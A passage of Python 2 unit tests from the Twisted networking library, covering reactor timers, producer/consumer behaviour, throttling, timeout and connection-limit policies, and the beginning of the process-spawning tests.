def removeTimer(self, timer):
try:
timer.cancel()
except error.AlreadyCalled:
pass
self.timers.remove(timer)
def tearDown(self):
for t in self.triggers:
try:
reactor.removeSystemEventTrigger(t)
except:
pass
def testRun(self):
"""
Test that reactor.crash terminates reactor.run
"""
for i in xrange(3):
reactor.callLater(0.01, reactor.crash)
reactor.run()
def testIterate(self):
"""
Test that reactor.iterate(0) doesn't block
"""
start = time.time()
# twisted timers are distinct from the underlying event loop's
# timers, so this fail-safe probably won't keep a failure from
# hanging the test
t = reactor.callLater(10, reactor.crash)
reactor.iterate(0) # shouldn't block
stop = time.time()
elapsed = stop - start
#print "elapsed", elapsed
self.failUnless(elapsed < 8)
t.cancel()
def test_crash(self):
"""
reactor.crash should NOT fire shutdown triggers
"""
events = []
self.addTrigger(
"before", "shutdown",
lambda: events.append(("before", "shutdown")))
# reactor.crash called from an "after-startup" trigger is too early
# for the gtkreactor: gtk_mainloop is not yet running. Same is true
# when called with reactor.callLater(0). Must be >0 seconds in the
# future to let gtk_mainloop start first.
reactor.callWhenRunning(
reactor.callLater, 0, reactor.crash)
reactor.run()
self.failIf(events, "reactor.crash invoked shutdown triggers, but it "
"isn't supposed to.")
# XXX Test that reactor.stop() invokes shutdown triggers
class DelayedTestCase(unittest.TestCase):
def setUp(self):
self.finished = 0
self.counter = 0
self.timers = {}
self.deferred = defer.Deferred()
# ick. Sometimes there are magic timers already running:
# popsicle.Freezer.tick . Kill off all such timers now so they won't
# interfere with the test. Of course, this kind of requires that
# getDelayedCalls already works, so certain failure modes won't be
# noticed.
if not hasattr(reactor, "getDelayedCalls"):
return
for t in reactor.getDelayedCalls():
t.cancel()
reactor.iterate() # flush timers
def tearDown(self):
for t in self.timers.values():
t.cancel()
def checkTimers(self):
l1 = self.timers.values()
l2 = list(reactor.getDelayedCalls())
# There should be at least the calls we put in. There may be other
# calls that are none of our business and that we should ignore,
# though.
missing = []
for dc in l1:
if dc not in l2:
missing.append(dc)
if missing:
self.finished = 1
self.failIf(missing, "Should have been missing no calls, instead was missing " + repr(missing))
def callback(self, tag):
del self.timers[tag]
self.checkTimers()
def addCallback(self, tag):
self.callback(tag)
self.addTimer(15, self.callback)
def done(self, tag):
self.finished = 1
self.callback(tag)
self.deferred.callback(None)
def addTimer(self, when, callback):
self.timers[self.counter] = reactor.callLater(when * 0.01, callback,
self.counter)
self.counter += 1
self.checkTimers()
def testGetDelayedCalls(self):
if not hasattr(reactor, "getDelayedCalls"):
return
# This is not a race because we don't do anything which might call
# the reactor until we have all the timers set up. If we did, this
# test might fail on slow systems.
self.checkTimers()
self.addTimer(35, self.done)
self.addTimer(20, self.callback)
self.addTimer(30, self.callback)
which = self.counter
self.addTimer(29, self.callback)
self.addTimer(25, self.addCallback)
self.addTimer(26, self.callback)
self.timers[which].cancel()
del self.timers[which]
self.checkTimers()
self.deferred.addCallback(lambda x : self.checkTimers())
return self.deferred
def testActive(self):
dcall = reactor.callLater(0, lambda: None)
self.assertEquals(dcall.active(), 1)
reactor.iterate()
self.assertEquals(dcall.active(), 0)
resolve_helper = """
import %(reactor)s
%(reactor)s.install()
from twisted.internet import reactor
class Foo:
def __init__(self):
reactor.callWhenRunning(self.start)
self.timer = reactor.callLater(3, self.failed)
def start(self):
reactor.resolve('localhost').addBoth(self.done)
def done(self, res):
print 'done', res
reactor.stop()
def failed(self):
print 'failed'
self.timer = None
reactor.stop()
f = Foo()
reactor.run()
"""
class ChildResolveProtocol(protocol.ProcessProtocol):
def __init__(self, onCompletion):
self.onCompletion = onCompletion
def connectionMade(self):
self.output = []
self.error = []
def outReceived(self, out):
self.output.append(out)
def errReceived(self, err):
self.error.append(err)
def processEnded(self, reason):
self.onCompletion.callback((reason, self.output, self.error))
self.onCompletion = None
class Resolve(unittest.TestCase):
def testChildResolve(self):
# I've seen problems with reactor.run under gtk2reactor. Spawn a
# child which just does reactor.resolve after the reactor has
# started, fail if it does not complete in a timely fashion.
helperPath = os.path.abspath(self.mktemp())
helperFile = open(helperPath, 'w')
# Eeueuuggg
reactorName = reactor.__module__
helperFile.write(resolve_helper % {'reactor': reactorName})
helperFile.close()
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
helperDeferred = Deferred()
helperProto = ChildResolveProtocol(helperDeferred)
reactor.spawnProcess(helperProto, sys.executable, ("python", "-u", helperPath), env)
def cbFinished((reason, output, error)):
# If the output is "done 127.0.0.1\n" we don't really care what
# else happened.
output = ''.join(output)
if output != 'done 127.0.0.1\n':
self.fail((
"The child process failed to produce the desired results:\n"
" Reason for termination was: %r\n"
" Output stream was: %r\n"
" Error stream was: %r\n") % (reason.getErrorMessage(), output, ''.join(error)))
helperDeferred.addCallback(cbFinished)
return helperDeferred
if not interfaces.IReactorProcess(reactor, None):
Resolve.skip = "cannot run test: reactor doesn't support IReactorProcess"
class Counter:
index = 0
def add(self):
self.index = self.index + 1
class Order:
stage = 0
def a(self):
if self.stage != 0: raise RuntimeError
self.stage = 1
def b(self):
if self.stage != 1: raise RuntimeError
self.stage = 2
def c(self):
if self.stage != 2: raise RuntimeError
self.stage = 3
class callFromThreadTestCase(unittest.TestCase):
"""Task scheduling from threads tests."""
if interfaces.IReactorThreads(reactor, None) is None:
skip = "Nothing to test without thread support"
def schedule(self, *args, **kwargs):
"""Override in subclasses."""
reactor.callFromThread(*args, **kwargs)
def testScheduling(self):
c = Counter()
for i in range(100):
self.schedule(c.add)
for i in range(100):
reactor.iterate()
self.assertEquals(c.index, 100)
def testCorrectOrder(self):
o = Order()
self.schedule(o.a)
self.schedule(o.b)
self.schedule(o.c)
reactor.iterate()
reactor.iterate()
reactor.iterate()
self.assertEquals(o.stage, 3)
def testNotRunAtOnce(self):
c = Counter()
self.schedule(c.add)
# scheduled tasks should not be run at once:
self.assertEquals(c.index, 0)
reactor.iterate()
self.assertEquals(c.index, 1)
class MyProtocol(protocol.Protocol):
"""Sample protocol."""
class MyFactory(protocol.Factory):
"""Sample factory."""
protocol = MyProtocol
class ProtocolTestCase(unittest.TestCase):
def testFactory(self):
factory = MyFactory()
protocol = factory.buildProtocol(None)
self.assertEquals(protocol.factory, factory)
self.assert_( isinstance(protocol, factory.protocol) )
class DummyProducer(object):
"""
Very uninteresting producer implementation used by tests to ensure the
right methods are called by the consumer with which it is registered.
@type events: C{list} of C{str}
@ivar events: The producer/consumer related events which have happened to
this producer. Strings in this list may be C{'resume'}, C{'stop'}, or
C{'pause'}. Elements are added as they occur.
"""
def __init__(self):
self.events = []
def resumeProducing(self):
self.events.append('resume')
def stopProducing(self):
self.events.append('stop')
def pauseProducing(self):
self.events.append('pause')
class SillyDescriptor(abstract.FileDescriptor):
"""
A descriptor whose data buffer gets filled very fast.
Useful for testing FileDescriptor's IConsumer interface, since
the data buffer fills as soon as at least four characters are
written to it, and gets emptied in a single doWrite() cycle.
"""
bufferSize = 3
connected = True
def writeSomeData(self, data):
"""
Always write all data.
"""
return len(data)
def startWriting(self):
"""
Do nothing: bypass the reactor.
"""
stopWriting = startWriting
class ReentrantProducer(DummyProducer):
"""
Similar to L{DummyProducer}, but with a resumeProducing method which calls
back into an L{IConsumer} method of the consumer against which it is
registered.
@ivar consumer: The consumer with which this producer has been or will
be registered.
@ivar methodName: The name of the method to call on the consumer inside
C{resumeProducing}.
@ivar methodArgs: The arguments to pass to the consumer method invoked in
C{resumeProducing}.
"""
def __init__(self, consumer, methodName, *methodArgs):
super(ReentrantProducer, self).__init__()
self.consumer = consumer
self.methodName = methodName
self.methodArgs = methodArgs
def resumeProducing(self):
super(ReentrantProducer, self).resumeProducing()
getattr(self.consumer, self.methodName)(*self.methodArgs)
class TestProducer(unittest.TestCase):
"""
Test abstract.FileDescriptor's consumer interface.
"""
def test_doubleProducer(self):
"""
Verify that registering a non-streaming producer invokes its
resumeProducing() method and that you can only register one producer
at a time.
"""
fd = abstract.FileDescriptor()
fd.connected = 1
dp = DummyProducer()
fd.registerProducer(dp, 0)
self.assertEquals(dp.events, ['resume'])
self.assertRaises(RuntimeError, fd.registerProducer, DummyProducer(), 0)
def test_unconnectedFileDescriptor(self):
"""
Verify that registering a producer when the connection has already
been closed invokes its stopProducing() method.
"""
fd = abstract.FileDescriptor()
fd.disconnected = 1
dp = DummyProducer()
fd.registerProducer(dp, 0)
self.assertEquals(dp.events, ['stop'])
def _dontPausePullConsumerTest(self, methodName):
descriptor = SillyDescriptor()
producer = DummyProducer()
descriptor.registerProducer(producer, streaming=False)
self.assertEqual(producer.events, ['resume'])
del producer.events[:]
# Fill up the descriptor's write buffer so we can observe whether or
# not it pauses its producer in that case.
getattr(descriptor, methodName)('1234')
self.assertEqual(producer.events, [])
def test_dontPausePullConsumerOnWrite(self):
"""
Verify that FileDescriptor does not call producer.pauseProducing() on a
non-streaming pull producer in response to a L{IConsumer.write} call
which results in a full write buffer. Issue #2286.
"""
return self._dontPausePullConsumerTest('write')
def test_dontPausePullConsumerOnWriteSequence(self):
"""
Like L{test_dontPausePullConsumerOnWrite}, but for a call to
C{writeSequence} rather than L{IConsumer.write}.
C{writeSequence} is not part of L{IConsumer}, but
L{abstract.FileDescriptor} has supported consumery behavior in response
to calls to L{writeSequence} forever.
"""
return self._dontPausePullConsumerTest('writeSequence')
def _reentrantStreamingProducerTest(self, methodName):
descriptor = SillyDescriptor()
producer = ReentrantProducer(descriptor, methodName, 'spam')
descriptor.registerProducer(producer, streaming=True)
# Start things off by filling up the descriptor's buffer so it will
# pause its producer.
getattr(descriptor, methodName)('spam')
# Sanity check - make sure that worked.
self.assertEqual(producer.events, ['pause'])
del producer.events[:]
# After one call to doWrite, the buffer has been emptied so the
# FileDescriptor should resume its producer. That will result in an
# immediate call to FileDescriptor.write which will again fill the
# buffer and result in the producer being paused.
descriptor.doWrite()
self.assertEqual(producer.events, ['resume', 'pause'])
del producer.events[:]
# After a second call to doWrite, the exact same thing should have
# happened. Prior to the bugfix for which this test was written,
# FileDescriptor would have incorrectly believed its producer was
# already resumed (it was paused) and so not resume it again.
descriptor.doWrite()
self.assertEqual(producer.events, ['resume', 'pause'])
def test_reentrantStreamingProducerUsingWrite(self):
"""
Verify that FileDescriptor tracks producer's paused state correctly.
Issue #811, fixed in revision r12857.
"""
return self._reentrantStreamingProducerTest('write')
def test_reentrantStreamingProducerUsingWriteSequence(self):
"""
Like L{test_reentrantStreamingProducerUsingWrite}, but for calls to
C{writeSequence}.
C{writeSequence} is B{not} part of L{IConsumer}, however
C{abstract.FileDescriptor} has supported consumery behavior in response
to calls to C{writeSequence} forever.
"""
return self._reentrantStreamingProducerTest('writeSequence')
class PortStringification(unittest.TestCase):
if interfaces.IReactorTCP(reactor, None) is not None:
def testTCP(self):
p = reactor.listenTCP(0, protocol.ServerFactory())
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
if interfaces.IReactorUDP(reactor, None) is not None:
def testUDP(self):
p = reactor.listenUDP(0, protocol.DatagramProtocol())
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
if interfaces.IReactorSSL(reactor, None) is not None and ssl:
def testSSL(self, ssl=ssl):
pem = util.sibpath(__file__, 'server.pem')
p = reactor.listenSSL(0, protocol.ServerFactory(), ssl.DefaultOpenSSLContextFactory(pem, pem))
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
```
#### File: twisted/test/test_policies.py
```python
from __future__ import nested_scopes
from StringIO import StringIO
from twisted.trial import unittest
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.test.time_helpers import Clock
import time
from twisted.internet import protocol, reactor, address, defer
from twisted.protocols import policies
class StringIOWithoutClosing(StringIO):
def close(self): pass
class SimpleProtocol(protocol.Protocol):
connected = disconnected = 0
buffer = ""
def __init__(self):
self.dConnected = defer.Deferred()
self.dDisconnected = defer.Deferred()
def connectionMade(self):
self.connected = 1
self.dConnected.callback('')
def connectionLost(self, reason):
self.disconnected = 1
self.dDisconnected.callback('')
def dataReceived(self, data):
self.buffer += data
class SillyFactory(protocol.ClientFactory):
def __init__(self, p):
self.p = p
def buildProtocol(self, addr):
return self.p
class EchoProtocol(protocol.Protocol):
def pauseProducing(self):
self.paused = time.time()
def resumeProducing(self):
self.resume = time.time()
def stopProducing(self):
pass
def dataReceived(self, data):
self.transport.write(data)
class Server(protocol.ServerFactory):
protocol = EchoProtocol
class SimpleSenderProtocol(SimpleProtocol):
finished = 0
data = ''
def __init__(self, testcase):
self.testcase = testcase
def connectionMade(self):
SimpleProtocol.connectionMade(self)
self.writeSomething()
def writeSomething(self):
if self.disconnected:
if not self.finished:
self.fail()
else:
reactor.crash()
if not self.disconnected:
self.transport.write('foo')
reactor.callLater(1, self.writeSomething)
def finish(self):
self.finished = 1
self.transport.loseConnection()
def fail(self):
self.testcase.failed = 1
def dataReceived(self, data):
self.data += data
class WrapperTestCase(unittest.TestCase):
def testProtocolFactoryAttribute(self):
# Make sure protocol.factory is the wrapped factory, not the wrapping factory
f = Server()
wf = policies.WrappingFactory(f)
p = wf.buildProtocol(address.IPv4Address('TCP', '127.0.0.1', 35))
self.assertIdentical(p.wrappedProtocol.factory, f)
class WrappingFactory(policies.WrappingFactory):
protocol = lambda s, f, p: p
def startFactory(self):
policies.WrappingFactory.startFactory(self)
self.deferred.callback(None)
class ThrottlingTestCase(unittest.TestCase):
def doIterations(self, count=5):
for i in range(count):
reactor.iterate()
def testLimit(self):
server = Server()
c1, c2, c3, c4 = [SimpleProtocol() for i in range(4)]
tServer = policies.ThrottlingFactory(server, 2)
wrapTServer = WrappingFactory(tServer)
wrapTServer.deferred = defer.Deferred()
# Start listening
p = reactor.listenTCP(0, wrapTServer, interface="127.0.0.1")
n = p.getHost().port
def _connect123(results):
reactor.connectTCP("127.0.0.1", n, SillyFactory(c1))
c1.dConnected.addCallback(lambda r: reactor.connectTCP("127.0.0.1", n, SillyFactory(c2)))
c2.dConnected.addCallback(lambda r: reactor.connectTCP("127.0.0.1", n, SillyFactory(c3)))
return c3.dDisconnected
def _check123(results):
self.assertEquals([c.connected for c in c1, c2, c3], [1, 1, 1])
self.assertEquals([c.disconnected for c in c1, c2, c3], [0, 0, 1])
self.assertEquals(len(tServer.protocols.keys()), 2)
return results
def _lose1(results):
# disconnect one protocol and now another should be able to connect
c1.transport.loseConnection()
return c1.dDisconnected
def _connect4(results):
reactor.connectTCP("127.0.0.1", n, SillyFactory(c4))
return c4.dConnected
def _check4(results):
self.assertEquals(c4.connected, 1)
self.assertEquals(c4.disconnected, 0)
return results
def _cleanup(results):
for c in c2, c4:
c.transport.loseConnection()
return defer.DeferredList([
defer.maybeDeferred(p.stopListening),
c2.dDisconnected,
c4.dDisconnected])
wrapTServer.deferred.addCallback(_connect123)
wrapTServer.deferred.addCallback(_check123)
wrapTServer.deferred.addCallback(_lose1)
wrapTServer.deferred.addCallback(_connect4)
wrapTServer.deferred.addCallback(_check4)
wrapTServer.deferred.addCallback(_cleanup)
return wrapTServer.deferred
def testWriteLimit(self):
server = Server()
c1, c2 = SimpleProtocol(), SimpleProtocol()
# The throttling factory starts checking bandwidth immediately
now = time.time()
tServer = policies.ThrottlingFactory(server, writeLimit=10)
port = reactor.listenTCP(0, tServer, interface="127.0.0.1")
n = port.getHost()[2]
reactor.iterate(); reactor.iterate()
for c in c1, c2:
reactor.connectTCP("127.0.0.1", n, SillyFactory(c))
self.doIterations()
for p in tServer.protocols.keys():
p = p.wrappedProtocol
self.assert_(isinstance(p, EchoProtocol))
p.transport.registerProducer(p, 1)
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.writtenThisSecond, 20)
# at this point server should've written 20 bytes, 10 bytes
# above the limit so writing should be paused around 1 second
# from 'now', and resumed a second after that
for p in tServer.protocols.keys():
self.assert_(not hasattr(p.wrappedProtocol, "paused"))
self.assert_(not hasattr(p.wrappedProtocol, "resume"))
while not hasattr(p.wrappedProtocol, "paused"):
reactor.iterate()
self.assertEquals(tServer.writtenThisSecond, 0)
for p in tServer.protocols.keys():
self.assert_(hasattr(p.wrappedProtocol, "paused"))
self.assert_(not hasattr(p.wrappedProtocol, "resume"))
self.assert_(abs(p.wrappedProtocol.paused - now - 1.0) < 0.1)
while not hasattr(p.wrappedProtocol, "resume"):
reactor.iterate()
for p in tServer.protocols.keys():
self.assert_(hasattr(p.wrappedProtocol, "resume"))
self.assert_(abs(p.wrappedProtocol.resume -
p.wrappedProtocol.paused - 1.0) < 0.1)
c1.transport.loseConnection()
c2.transport.loseConnection()
port.stopListening()
for p in tServer.protocols.keys():
p.loseConnection()
self.doIterations()
def testReadLimit(self):
server = Server()
c1, c2 = SimpleProtocol(), SimpleProtocol()
now = time.time()
tServer = policies.ThrottlingFactory(server, readLimit=10)
port = reactor.listenTCP(0, tServer, interface="127.0.0.1")
n = port.getHost()[2]
self.doIterations()
for c in c1, c2:
reactor.connectTCP("127.0.0.1", n, SillyFactory(c))
self.doIterations()
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.readThisSecond, 20)
# we wrote 20 bytes, so after one second it should stop reading
# and then a second later start reading again
while time.time() - now < 1.05:
reactor.iterate()
self.assertEquals(tServer.readThisSecond, 0)
# write some more - data should *not* get written for another second
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.readThisSecond, 0)
while time.time() - now < 2.05:
reactor.iterate()
self.assertEquals(c1.buffer, "01234567890123456789")
self.assertEquals(c2.buffer, "abcdefghijabcdefghij")
c1.transport.loseConnection()
c2.transport.loseConnection()
port.stopListening()
for p in tServer.protocols.keys():
p.loseConnection()
self.doIterations()
# These fail intermittently.
testReadLimit.skip = "Inaccurate tests are worse than no tests."
testWriteLimit.skip = "Inaccurate tests are worse than no tests."
class TimeoutTestCase(unittest.TestCase):
def setUpClass(self):
self.clock = Clock()
self.clock.install()
def tearDownClass(self):
self.clock.uninstall()
def _serverSetup(self):
# Create a server factory, get a protocol from it, connect it to a
# transport, and return all three.
wrappedFactory = protocol.ServerFactory()
wrappedFactory.protocol = SimpleProtocol
factory = policies.TimeoutFactory(wrappedFactory, 3)
proto = factory.buildProtocol(address.IPv4Address('TCP', '127.0.0.1', 12345))
transport = StringTransportWithDisconnection()
transport.protocol = proto
proto.makeConnection(transport)
return factory, proto, transport
def testTimeout(self):
# Make sure that when a TimeoutFactory accepts a connection, it will
# time out that connection if no data is read or written within the
# timeout period.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let almost 3 time units pass
self.clock.pump(reactor, [0.0, 0.5, 1.0, 1.0, 0.4])
self.failIf(proto.wrappedProtocol.disconnected)
# Now let the timer elapse
self.clock.pump(reactor, [0.0, 0.2])
self.failUnless(proto.wrappedProtocol.disconnected)
def testSendAvoidsTimeout(self):
# Make sure that writing data to a transport from a protocol
# constructed by a TimeoutFactory resets the timeout countdown.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let half the countdown period elapse
self.clock.pump(reactor, [0.0, 0.5, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Send some data (proto is the /real/ proto's transport, so this is
# the write that gets called)
proto.write('bytes bytes bytes')
# More time passes, putting us past the original timeout
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Make sure writeSequence delays timeout as well
proto.writeSequence(['bytes'] * 3)
# Tick tock
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Don't write anything more, just let the timeout expire
self.clock.pump(reactor, [0.0, 2.0])
self.failUnless(proto.wrappedProtocol.disconnected)
def testReceiveAvoidsTimeout(self):
# Make sure that receiving data also resets the timeout countdown.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let half the countdown period elapse
self.clock.pump(reactor, [0.0, 1.0, 0.5])
self.failIf(proto.wrappedProtocol.disconnected)
# Some bytes arrive, they should reset the counter
proto.dataReceived('bytes bytes bytes')
# We pass the original timeout
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Nothing more arrives though, the new timeout deadline is passed,
# the connection should be dropped.
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failUnless(proto.wrappedProtocol.disconnected)
class TimeoutTester(protocol.Protocol, policies.TimeoutMixin):
timeOut = 3
timedOut = 0
def connectionMade(self):
self.setTimeout(self.timeOut)
def dataReceived(self, data):
self.resetTimeout()
protocol.Protocol.dataReceived(self, data)
def connectionLost(self, reason=None):
self.setTimeout(None)
def timeoutConnection(self):
self.timedOut = 1
class TestTimeout(unittest.TestCase):
def setUpClass(self):
self.clock = Clock()
self.clock.install()
def tearDownClass(self):
self.clock.uninstall()
def testOverriddenCallLater(self):
"""
Test that setting callLater on a subclass of TimeoutMixin causes the
protocol to use that callable instead of C{reactor.callLater}.
"""
calls = []
p = TimeoutTester()
p.callLater = lambda *a, **kw: calls.append((a, kw))
p.setTimeout(10)
self.assertEquals(len(calls), 1)
def testTimeout(self):
p = TimeoutTester()
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
self.clock.pump(reactor, [0, 0.5, 1.0, 1.0])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 1.0])
self.failUnless(p.timedOut)
def testNoTimeout(self):
p = TimeoutTester()
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
self.clock.pump(reactor, [0, 0.5, 1.0, 1.0])
self.failIf(p.timedOut)
p.dataReceived('hello there')
self.clock.pump(reactor, [0, 1.0, 1.0, 0.5])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 1.0])
self.failUnless(p.timedOut)
def testResetTimeout(self):
p = TimeoutTester()
p.timeOut = None
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
p.setTimeout(1)
self.assertEquals(p.timeOut, 1)
self.clock.pump(reactor, [0, 0.9])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 0.2])
self.failUnless(p.timedOut)
def testCancelTimeout(self):
p = TimeoutTester()
p.timeOut = 5
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
p.setTimeout(None)
self.assertEquals(p.timeOut, None)
self.clock.pump(reactor, [0, 5, 5, 5])
self.failIf(p.timedOut)
def testReturn(self):
p = TimeoutTester()
p.timeOut = 5
self.assertEquals(p.setTimeout(10), 5)
self.assertEquals(p.setTimeout(None), 10)
self.assertEquals(p.setTimeout(1), None)
self.assertEquals(p.timeOut, 1)
# Clean up the DelayedCall
p.setTimeout(None)
class LimitTotalConnectionsFactoryTestCase(unittest.TestCase):
"""Tests for policies.LimitTotalConnectionsFactory"""
def testConnectionCounting(self):
# Make a basic factory
factory = policies.LimitTotalConnectionsFactory()
factory.protocol = protocol.Protocol
# connectionCount starts at zero
self.assertEqual(0, factory.connectionCount)
# connectionCount increments as connections are made
p1 = factory.buildProtocol(None)
self.assertEqual(1, factory.connectionCount)
p2 = factory.buildProtocol(None)
self.assertEqual(2, factory.connectionCount)
# and decrements as they are lost
p1.connectionLost(None)
self.assertEqual(1, factory.connectionCount)
p2.connectionLost(None)
self.assertEqual(0, factory.connectionCount)
def testConnectionLimiting(self):
# Make a basic factory with a connection limit of 1
factory = policies.LimitTotalConnectionsFactory()
factory.protocol = protocol.Protocol
factory.connectionLimit = 1
# Make a connection
p = factory.buildProtocol(None)
self.assertNotEqual(None, p)
self.assertEqual(1, factory.connectionCount)
# Try to make a second connection, which will exceed the connection
# limit. This should return None, because overflowProtocol is None.
self.assertEqual(None, factory.buildProtocol(None))
self.assertEqual(1, factory.connectionCount)
# Define an overflow protocol
class OverflowProtocol(protocol.Protocol):
def connectionMade(self):
factory.overflowed = True
factory.overflowProtocol = OverflowProtocol
factory.overflowed = False
# Try to make a second connection again, now that we have an overflow
# protocol. Note that overflow connections count towards the connection
# count.
op = factory.buildProtocol(None)
op.makeConnection(None) # to trigger connectionMade
self.assertEqual(True, factory.overflowed)
self.assertEqual(2, factory.connectionCount)
# Close the connections.
p.connectionLost(None)
self.assertEqual(1, factory.connectionCount)
op.connectionLost(None)
self.assertEqual(0, factory.connectionCount)
class WriteSequenceEchoProtocol(EchoProtocol):
def dataReceived(self, bytes):
if bytes.find('vector!') != -1:
self.transport.writeSequence([bytes])
else:
EchoProtocol.dataReceived(self, bytes)
class TestLoggingFactory(policies.TrafficLoggingFactory):
openFile = None
def open(self, name):
assert self.openFile is None, "open() called too many times"
self.openFile = StringIO()
return self.openFile
class LoggingFactoryTestCase(unittest.TestCase):
def testThingsGetLogged(self):
wrappedFactory = Server()
wrappedFactory.protocol = WriteSequenceEchoProtocol
t = StringTransportWithDisconnection()
f = TestLoggingFactory(wrappedFactory, 'test')
p = f.buildProtocol(('1.2.3.4', 5678))
t.protocol = p
p.makeConnection(t)
v = f.openFile.getvalue()
self.failUnless('*' in v, "* not found in %r" % (v,))
self.failIf(t.value())
p.dataReceived('here are some bytes')
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find("C 1: 'here are some bytes'"), "Expected client string not found in %r" % (v,))
self.assertNotEqual(-1, v.find("S 1: 'here are some bytes'"), "Expected server string not found in %r" % (v,))
self.assertEquals(t.value(), 'here are some bytes')
t.clear()
p.dataReceived('prepare for vector! to the extreme')
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find("SV 1: ['prepare for vector! to the extreme']"), "Expected server string not found in %r" % (v,))
self.assertEquals(t.value(), 'prepare for vector! to the extreme')
p.loseConnection()
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find('ConnectionDone'), "Connection done notification not found in %r" % (v,))
```
#### File: twisted/test/test_process.py
```python
from __future__ import nested_scopes, generators
from twisted.trial import unittest
from twisted.python import log
import gzip
import os
import popen2
import sys
import signal
import warnings
from pprint import pformat
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.internet import reactor, protocol, error, interfaces, defer
from twisted.internet.protocol import ProcessProtocol
from twisted.internet.defer import Deferred
from twisted.python import util, runtime
from twisted.python import procutils
class TrivialProcessProtocol(protocol.ProcessProtocol):
def __init__(self, d):
self.deferred = d
def processEnded(self, reason):
self.reason = reason
self.deferred.callback(None)
class TestProcessProtocol(protocol.ProcessProtocol):
def connectionMade(self):
self.stages = [1]
self.data = ''
self.err = ''
self.transport.write("abcd")
def outReceived(self, data):
self.data = self.data + data
def outConnectionLost(self):
self.stages.append(2)
if self.data != "abcd":
raise RuntimeError
self.transport.write("1234")
def errReceived(self, data):
self.err = self.err + data
def errConnectionLost(self):
self.stages.append(3)
if self.err != "1234":
print 'err != 1234: ' + repr(self.err)
raise RuntimeError()
self.transport.write("abcd")
self.stages.append(4)
def inConnectionLost(self):
self.stages.append(5)
def processEnded(self, reason):
self.reason = reason
self.deferred.callback(None)
class EchoProtocol(protocol.ProcessProtocol):
s = "1234567" * 1001
n = 10
finished = 0
failure = None
def __init__(self, onEnded):
self.onEnded = onEnded
self.count = 0
def connectionMade(self):
assert self.n > 2
for i in range(self.n - 2):
self.transport.write(self.s)
# test writeSequence
self.transport.writeSequence([self.s, self.s])
self.buffer = self.s * self.n
def outReceived(self, data):
if buffer(self.buffer, self.count, len(data)) != buffer(data):
self.failure = ("wrong bytes received", data, self.count)
self.transport.closeStdin()
else:
self.count += len(data)
if self.count == len(self.buffer):
self.transport.closeStdin()
def processEnded(self, reason):
self.finished = 1
if not reason.check(error.ProcessDone):
self.failure = "process didn't terminate normally: " + str(reason)
self.onEnded.callback(self)
class SignalProtocol(protocol.ProcessProtocol):
def __init__(self, deferred, sig):
self.deferred = deferred
self.signal = sig
def outReceived(self, data):
self.transport.signalProcess(self.signal)
def processEnded(self, reason):
if not reason.check(error.ProcessTerminated):
self.deferred.callback("wrong termination: %s" % reason)
return
v = reason.value
if v.exitCode is not None:
self.deferred.callback("SIG%s: exitCode is %s, not None" %
(self.signal, v.exitCode))
return
if v.signal != getattr(signal,'SIG'+self.signal):
self.deferred.callback("SIG%s: .signal was %s, wanted %s" %
(self.signal, v.signal,
getattr(signal,'SIG'+self.signal)))
return
if os.WTERMSIG(v.status) != getattr(signal,'SIG'+self.signal):
self.deferred.callback('SIG%s: %s'
% (self.signal, os.WTERMSIG(v.status)))
return
self.deferred.callback(None)
class SignalMixin:
# XXX: Trial now does this (see
# twisted.trial.runner.MethodInfoBase._setUpSigchldHandler)... perhaps
# this class should be removed? Or trial shouldn't bother, and this
# class used where it matters?
# - spiv, 2005-04-01
sigchldHandler = None
def setUpClass(self):
# make sure SIGCHLD handler is installed, as it should be on
# reactor.run(). Do this because the reactor may not have been run
# by the time this test runs.
if hasattr(reactor, "_handleSigchld") and hasattr(signal, "SIGCHLD"):
log.msg("Installing SIGCHLD signal handler.")
self.sigchldHandler = signal.signal(signal.SIGCHLD,
reactor._handleSigchld)
else:
log.msg("Skipped installing SIGCHLD signal handler.")
def tearDownClass(self):
if self.sigchldHandler:
log.msg("Uninstalled SIGCHLD signal handler.")
signal.signal(signal.SIGCHLD, self.sigchldHandler)
class TestManyProcessProtocol(TestProcessProtocol):
def __init__(self):
self.deferred = defer.Deferred()
def processEnded(self, reason):
self.reason = reason
if reason.check(error.ProcessDone):
self.deferred.callback(None)
else:
self.deferred.errback(reason)
class UtilityProcessProtocol(ProcessProtocol):
"""
